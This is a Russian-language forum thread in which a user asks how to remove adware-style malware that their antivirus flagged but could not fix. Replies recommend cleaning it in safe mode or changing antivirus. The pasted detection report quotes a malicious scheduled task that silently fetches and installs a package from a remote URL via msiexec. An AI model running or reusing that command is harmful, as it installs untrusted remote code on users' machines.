Как удалить вирус?

Вячеслав Злотник Мастер (1817), закрыт 5 лет назад
Подцепил вирус. Просканив ось 360 Total Security, обнаружил потенциально опасный элемент, который антивирус исправить почему-то не в состоянии, тупо пишет что "исправление не удалось" без каких либо пояснений. Ниже привожу детали об обнаруженном элементе

Тип:
Приложения, которые не рекомендуется запускать при старте системы

Описание:
Это неизвестные программы, которые представляют потенциальную угрозу компьютеру и могут влиять на быстродействие системы. Для автоматического запуска приложения добавьте его в "белый список"

Группа:
Запланированные задания

Механизм проверки:
Облачный сканер 360

Путь файла:
""msiexec"" -q -i https://universalstartingers.com/kvhzgizydotm.pij

Запланированная задача:
C:\WINDOWS\Sysnative\Tasks\{4728AAB8-4120-92ED-91A0-CD5F8F4D55EE}

Предложение:
Запрещено с момента запуска
Лучший ответ
Веуз Мастер (1322) 5 лет назад
Загрузиться с безопасного режима и удалить
Вячеслав ЗлотникМастер (1817) 5 лет назад
Впадлу было вспоминать как на десятке в безопаску попасть, но результат того стоил. Спасибо
Веуз Мастер (1322) я рад))
Остальные ответы
добрейший князь тишины Искусственный Интеллект (228616) 5 лет назад
Так проверь сканером типа курейт, 360 уже давно не хороший ав. Снеси и поставь другой. Каспера, битдефендер,, есет.
открытки@mail.ru Просветленный (41735) 5 лет назад
Вячеслав ЗлотникМастер (1817) 5 лет назад
Нашло ещё кучу говна, но основной вирус открывающий рекламу также не удалил. Смог решить сканированием системы в безопасном режиме